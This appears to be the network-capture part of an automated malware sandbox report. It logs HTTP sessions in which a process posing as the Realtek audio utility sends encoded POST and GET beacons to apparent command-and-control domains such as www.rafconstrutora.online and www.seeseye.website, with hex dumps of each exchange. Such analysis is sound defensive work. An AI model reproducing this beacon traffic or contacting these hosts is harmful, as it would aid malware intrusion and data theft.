                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 42 31 64 50 67 67 4d 62 38 66 39 6c 65 54 56 32 4a 62 2b 44 59 49 6e 45 65 6a 4d 46 54 30 30 44 79 52 6d 43 45 46 51 4a 44 4b 67 4c 48 61 48 37 54 30 4c 6f 6e 47 4d 54 4d 65 45 38 75 6f 35 59 4c 2b 4a 66 58 49 78 51 5a 7a 35 53 44 44 71 55 74 72 75 56 45 67 77 6f 33 6e 4e 49 71 37 69 79 72 6b 72 61 4a 6f 41 66 42 34 79 31 6b 4b 70 6f 64 62 7a 6b 6a 48 67 6a 35 75 4a 68 57 4f 2b 4c 4d 57 76 37 56 48 52 55 34 51 2f 78 62 43 32 63 41 4a 68 35 6c 33 5a 48 4f 35 57 74 63 30 70 49 32 55 35 49 4e 33 44 48 69 66 2f 4c 4f 4d 6d 32 38 66 79 6e 31 46 76 51 58 4d 54 6f 77 63 69 67 71 4d 6a 78 6e 64 62 75 38 4e 6c 54 30 45 45 65 43 39 54 53 71 41 49 3d
                                                                                                  Data Ascii: 6aonl5x=B1dPggMb8f9leTV2Jb+DYInEejMFT00DyRmCEFQJDKgLHaH7T0LonGMTMeE8uo5YL+JfXIxQZz5SDDqUtruVEgwo3nNIq7iyrkraJoAfB4y1kKpodbzkjHgj5uJhWO+LMWv7VHRU4Q/xbC2cAJh5l3ZHO5Wtc0pI2U5IN3DHif/LOMm28fyn1FvQXMTowcigqMjxndbu8NlT0EEeC9TSqAI=
                                                                                                  Dec 3, 2024 09:50:21.299427032 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:50:21 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Jm0F7rUfa3rxyaInr%2FVqOs4oRFf83n3CI82HRh3vFiigq3GViiLo39DwUDxdLkebkug82WlbrNg4hPaRO4q9p7Yc6HtnonJrGHY0JVcsownoCXz%2B2g2bT%2FLTVaM9JAmuSUUc%2FY2wfyhAYMB"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24f025e02428b-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=103143&min_rtt=103143&rtt_var=51571&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.Z.a2C-Su]B
                                                                                                  Dec 3, 2024 09:50:21.299442053 CET428INData Raw: 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13 b1 26 eb f9 ff 85 ea 86 3d 55 bf 5d 8d af fe 25 3e 0e 0e 97 72 bc a2 ec ee
                                                                                                  Data Ascii: >RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX;4y6JLn<5
                                                                                                  Dec 3, 2024 09:50:21.299448013 CET22INData Raw: 63 0d 0a e3 e5 02 00 66 df cc 8d 39 09 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: cf90


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  43192.168.11.3049908172.67.159.24805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:23.766858101 CET2578OUTPOST /j7ub/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.rafconstrutora.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.rafconstrutora.online
                                                                                                  Referer: http://www.rafconstrutora.online/j7ub/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 42 31 64 50 67 67 4d 62 38 66 39 6c 65 54 56 32 4a 62 2b 44 59 49 6e 45 65 6a 4d 46 54 30 30 44 79 52 6d 43 45 46 51 4a 44 4b 59 4c 47 76 54 37 51 58 6a 6f 6d 47 4d 54 43 2b 45 78 75 6f 34 43 4c 2b 51 55 58 49 74 75 5a 78 42 53 44 68 69 55 72 5a 47 56 64 51 77 6f 34 48 4e 4a 31 4c 69 6a 72 6e 44 67 4a 72 6f 66 42 34 79 31 6b 4e 52 6f 4c 34 72 6b 6c 48 67 67 77 4f 49 75 41 2b 2b 6e 4d 56 66 30 56 48 56 75 34 56 72 78 62 52 4f 63 41 36 5a 35 6c 33 5a 48 55 70 57 6f 63 30 6c 4e 32 55 77 52 4e 7a 58 58 68 76 4c 4c 4e 74 54 2f 67 65 4f 46 67 55 4c 4e 54 4f 54 42 37 2b 2b 75 73 75 48 47 68 65 66 43 79 65 73 34 33 7a 34 4c 59 73 44 43 70 6d 75 34 38 6c 73 55 6b 62 73 73 39 62 31 56 6c 6f 61 51 65 52 78 62 6e 50 49 4e 4a 72 37 4b 63 4f 34 42 32 77 74 4f 4a 31 43 32 52 77 49 37 52 41 32 41 6e 41 62 52 78 46 34 69 36 41 49 6a 38 47 36 58 2f 47 46 4e 4d 4e 77 75 41 56 32 75 51 67 6d 4d 30 32 45 37 68 42 46 5a 36 6f 33 52 58 4c 46 4c 45 6a 66 47 53 36 57 46 52 4c 53 31 4e 2f 35 66 42 34 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=B1dPggMb8f9leTV2Jb+DYInEejMFT00DyRmCEFQJDKYLGvT7QXjomGMTC+Exuo4CL+QUXItuZxBSDhiUrZGVdQwo4HNJ1LijrnDgJrofB4y1kNRoL4rklHggwOIuA++nMVf0VHVu4VrxbROcA6Z5l3ZHUpWoc0lN2UwRNzXXhvLLNtT/geOFgULNTOTB7++usuHGhefCyes43z4LYsDCpmu48lsUkbss9b1VloaQeRxbnPINJr7KcO4B2wtOJ1C2RwI7RA2AnAbRxF4i6AIj8G6X/GFNMNwuAV2uQgmM02E7hBFZ6o3RXLFLEjfGS6WFRLS1N/5fB4qdE99PBw6UdIiwoVlzAjLHS/hGYoV6rvL4mdEzKgFRLeCMMX1JL6FNVuz4pNXzm6/s1PJHi1rY8dbP7j0GUmtuSGzB3vurhMUpsdWKCSDCybtLiysvRvNZsqd5EutHcdM1E6hu+UdHfQ8fcvGLp/Z2vDxWE7Q6LcyxPZHFFmNwo/Aeme51wkC2LRQzHobJ1wJH6Qd8yB6p4ATacJ0NKrQHnEtgrwagfRJ7xApLOg2SyAjrmDNquXl60obecPCP2O9HsrI14TkCmqWVzlOKi0tR3Q59Q9yzyXwm2fKOn0THIv5lMi8cN0SmkeoK8p9Tv5ryHbPLzFqBcwYAl9iiShvBe3JOKewhZ9ehRjHzpQPraXcSkWtO4JOBijDblzRz1eawFzvwvAgeMkSQgcKsTC/0ChdT913KiL4O8bqJfsKbB9hjO5QGrW48oY0STu7bECkXQjI/W8ag+g2RQ2WBsfwSBIjjc0oqCp+2EZI75i9UH9s2sIPdjlnZXo8WK4ngvDokR3IIeOKiOJBFB9t8wy6qsACLyKuYhjh5/P491K3FntRdjF6oryTUuqyDclrc3NI4h1QX0Zl+fhJFOoLvrW1N7H4ShIXoHrT9yOjnNXAmNolN2Wki0+nNKtSZHu8RdSHYE52gYHcuRH/NsSJA73ItsQazLF0yAbt3 [TRUNCATED]
                                                                                                  Dec 3, 2024 09:50:23.767045975 CET1258OUTData Raw: 69 73 2f 79 42 2b 55 35 49 48 4b 72 32 79 56 74 5a 78 6f 64 7a 36 62 4d 59 7a 52 57 63 45 34 43 51 45 65 52 53 34 78 4a 73 45 6c 74 2b 64 75 70 4c 43 6d 4d 4d 69 63 57 46 45 51 51 76 39 52 49 7a 71 42 6d 36 79 43 61 79 43 6c 65 43 4f 39 61 79 51
                                                                                                  Data Ascii: is/yB+U5IHKr2yVtZxodz6bMYzRWcE4CQEeRS4xJsElt+dupLCmMMicWFEQQv9RIzqBm6yCayCleCO9ayQO1y1W8ZJM+vFqoC33TmCM0p/M6ZmsLyqvvV8n1LFjvPj9myWtcw4yH7Ab5R/4gNRdlpd2RzmFAdzPIeN46/gBbdW4k2PRJWpdtbUUVqzKUD1wKZY4RsWjGMxOJIKVNEixXM8lNKTC4wkOy3WX6jK9x6GIy4UdV/k+
                                                                                                  Dec 3, 2024 09:50:23.939249992 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:50:23 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COA1jnOlJHoKY0IsqSaVq9wN8yz4YrIVbnA7obau7NGWZG4WPSStbn%2B%2Bm%2BEVCAAZSYyzqVaiWSWPr1WhyniEpybsSAUsqtY8IepM2tNSwn31M7xKQSrMUtcCx54tHd8fn8HpGxn52UVc08jG"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24f12dbd38c96-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=103358&min_rtt=103358&rtt_var=51679&sent=2&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=3836&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                                                  Data Ascii: 34bnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.Z.a2C-Su]B>
                                                                                                  Dec 3, 2024 09:50:23.939269066 CET439INData Raw: 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13 b1 26 eb f9 ff 85 ea 86 3d 55 bf 5d 8d af fe 25 3e 0e 0e 97 72 bc a2 ec ee 33
                                                                                                  Data Ascii: RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX;4y6JLn<5
                                                                                                  Dec 3, 2024 09:50:23.939275026 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  44192.168.11.3049909172.67.159.24805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:26.404134989 CET422OUTGET /j7ub/?6aonl5x=M31vjVse/vBHPClvW92sHY7DTEoHQnoyrxzVLyROLYYAQdrxO36MkUElM+4Sk6N4OaZzF61ZUyEPGTTLpIW+aC9+xnt1oIHfkyDsG4AUT/SJuMBYTZz9qAA=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.rafconstrutora.online
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:50:26.571535110 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:50:26 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLUtjnz8ih8PmGHdtbMaO7CNyTIuuGXKjzV10YMiUFrzvh9EFEJhKv8XGmAVpo64Zwp30TOEMI4vMis62l%2FktEG%2BsrS6XLSI4%2Bj0i11jY94durH3J%2Fhj20K%2FtnG%2Bz%2B4L6aLlSFbDX%2FLBY37y"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24f235b3fde94-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102781&min_rtt=102781&rtt_var=51390&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=422&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d [TRUNCATED]
                                                                                                  Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/
                                                                                                  Dec 3, 2024 09:50:26.571547031 CET1289INData Raw: 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f
                                                                                                  Data Ascii: cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/
                                                                                                  Dec 3, 2024 09:50:26.571587086 CET653INData Raw: 50 61 72 65 63 65 20 71 75 65 20 61 20 70 c3 a1 67 69 6e 61 20 71 75 65 20 76 6f 63 c3 aa 20 65 73 74 c3 a1 20 70 72 6f 63 75 72 61 6e 64 6f 20 66 6f 69 20 6d 6f 76 69 64 61 20 6f 75 20 6e 75 6e 63 61 20 65 78 69 73 74 69 75 2c 20 63 65 72 74 69
                                                                                                  Data Ascii: Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link vlido.</p> <a href="https://www.hostgator.com.br" title="HostGator">Conhea-nos!</a
                                                                                                  Dec 3, 2024 09:50:26.571593046 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  45192.168.11.3049910103.224.182.242805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:32.003576040 CET681OUTPOST /ebz6/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.seeseye.website
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.seeseye.website
                                                                                                  Referer: http://www.seeseye.website/ebz6/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 76 70 72 46 54 35 65 57 34 34 69 2f 77 39 69 63 69 6c 4c 49 39 71 32 36 78 6d 71 61 4b 50 66 47 54 53 54 73 72 69 4d 54 79 30 59 42 55 71 70 5a 59 4c 62 35 55 2b 2b 67 62 70 2b 6c 4c 30 4b 4b 39 6f 2b 79 2b 6f 41 51 43 6a 53 75 62 4f 70 54 42 4a 61 49 4b 59 74 63 38 57 6a 4f 43 34 44 6c 6c 42 66 38 47 34 4c 73 79 69 6a 6e 77 41 43 4d 54 4f 58 7a 6a 74 52 55 72 31 37 59 66 57 76 51 58 48 6a 61 75 68 73 70 59 65 75 46 4f 6e 48 48 6e 50 76 5a 56 66 62 2f 39 38 72 4f 7a 65 7a 77 50 66 6a 2b 34 43 4a 6f 32 41 69 42 37 71 34 6e 79 63 66 4f 66 4d 68 64 73 78 68 65 74 6f 54 39 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=ovprFT5eW44i/w9icilLI9q26xmqaKPfGTSTsriMTy0YBUqpZYLb5U++gbp+lL0KK9o+y+oAQCjSubOpTBJaIKYtc8WjOC4DllBf8G4LsyijnwACMTOXzjtRUr17YfWvQXHjauhspYeuFOnHHnPvZVfb/98rOzezwPfj+4CJo2AiB7q4nycfOfMhdsxhetoT9Q==
                                                                                                  Dec 3, 2024 09:50:32.192991018 CET874INHTTP/1.1 200 OK
                                                                                                  date: Tue, 03 Dec 2024 08:50:32 GMT
                                                                                                  server: Apache
                                                                                                  set-cookie: __tad=1733215832.7605882; expires=Fri, 01-Dec-2034 08:50:32 GMT; Max-Age=315360000
                                                                                                  vary: Accept-Encoding
                                                                                                  content-encoding: gzip
                                                                                                  content-length: 579
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  connection: close
                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 08 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 2b f2 ef a3 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 98 8b 63 38 ca bd 72 ba 27 a0 7d 8f 45 4c 78 4f e2 56 6e e5 31 1a 83 77 aa 88 c5 ad 17 b5 36 6b 74 bd d3 86 84 d6 35 66 9d 36 d9 ad 8f cb 5c 1c b1 af a5 2a a3 ad 74 e0 b0 d2 0e 15 fd 6a b5 b9 83 02 92 86 a8 5f 08 b1 db ed b2 17 12 05 ae fe 5c 89 8f c9 32 8a 84 80 1b 24 90 40 ba 43 bb 21 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 1e d5 86 90 81 8f 75 40 d7 40 0d c2 33 f9 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 18 45 da 1a 3e 6e db 95 54 77 d7 63 aa 74 0a 0f d1 64 a7 4d 65 77 59 6b 95 0c a8 cc 61 df 4a 85 e9 3f c6 ce 93 ba 2f 2e 3e 24 d3 65 74 88 22 72 fb c0 64 95 9e c0 55 ee c7 68 a2 00 8f 34 6e d2 97 d5 de 05 83 cc 9f 84 ae d5 fd f7 51 73 01 9f 9f 9c 7c bd 61 1d b2 4a 1f 3a 6b 34 59 0e ad 17 41 b6 c7 43 60 [TRUNCATED]
                                                                                                  Data Ascii: Tn0=_A;jnAX-y4+7C-==rPQAZ,==f;\yMc8r'}ELxOVn1w6kt5f6\*tj_\2$@C!5g3r@u@@3;i1[umLE>nTwctdMewYkaJ?/.>$et"rdUh4nQs|aJ:k4YAC`XdqLZP-[#2q7-:b_S-GKmeB}&E>;(VhS-.gj~`bx-jlk]!-og+[$~c.288<)?ZAi5.Rss"2&"bb[5=eC//k0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  46192.168.11.3049911103.224.182.242805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:34.705077887 CET701OUTPOST /ebz6/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.seeseye.website
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.seeseye.website
                                                                                                  Referer: http://www.seeseye.website/ebz6/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 76 70 72 46 54 35 65 57 34 34 69 2b 54 6c 69 51 6c 35 4c 41 39 71 31 6d 68 6d 71 51 71 50 62 47 54 4f 54 73 71 58 58 54 42 63 59 50 56 61 70 65 5a 4c 62 30 30 2b 2b 34 4c 70 2f 34 62 31 6e 4b 39 73 70 79 2f 55 41 51 43 33 53 75 61 65 70 54 79 52 5a 4a 61 59 72 55 63 57 68 57 69 34 44 6c 6c 42 66 38 46 45 74 73 79 71 6a 6e 41 51 43 4d 32 36 57 35 44 74 53 54 72 31 37 4a 50 57 6a 51 58 48 42 61 76 74 43 70 64 43 75 46 4b 6a 48 65 57 50 73 41 6c 66 5a 69 4e 39 4a 4b 52 33 43 34 73 7a 33 31 59 71 48 76 46 4d 71 45 73 48 69 36 78 6f 64 64 2f 77 4d 42 74 63 4a 63 76 70 49 67 64 39 32 36 37 63 31 73 63 69 45 79 74 38 58 44 66 67 67 58 4f 30 3d
                                                                                                  Data Ascii: 6aonl5x=ovprFT5eW44i+TliQl5LA9q1mhmqQqPbGTOTsqXXTBcYPVapeZLb00++4Lp/4b1nK9spy/UAQC3SuaepTyRZJaYrUcWhWi4DllBf8FEtsyqjnAQCM26W5DtSTr17JPWjQXHBavtCpdCuFKjHeWPsAlfZiN9JKR3C4sz31YqHvFMqEsHi6xodd/wMBtcJcvpIgd9267c1sciEyt8XDfggXO0=
                                                                                                  Dec 3, 2024 09:50:34.878068924 CET874INHTTP/1.1 200 OK
                                                                                                  date: Tue, 03 Dec 2024 08:50:34 GMT
                                                                                                  server: Apache
                                                                                                  set-cookie: __tad=1733215834.8600757; expires=Fri, 01-Dec-2034 08:50:34 GMT; Max-Age=315360000
                                                                                                  vary: Accept-Encoding
                                                                                                  content-encoding: gzip
                                                                                                  content-length: 579
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  connection: close
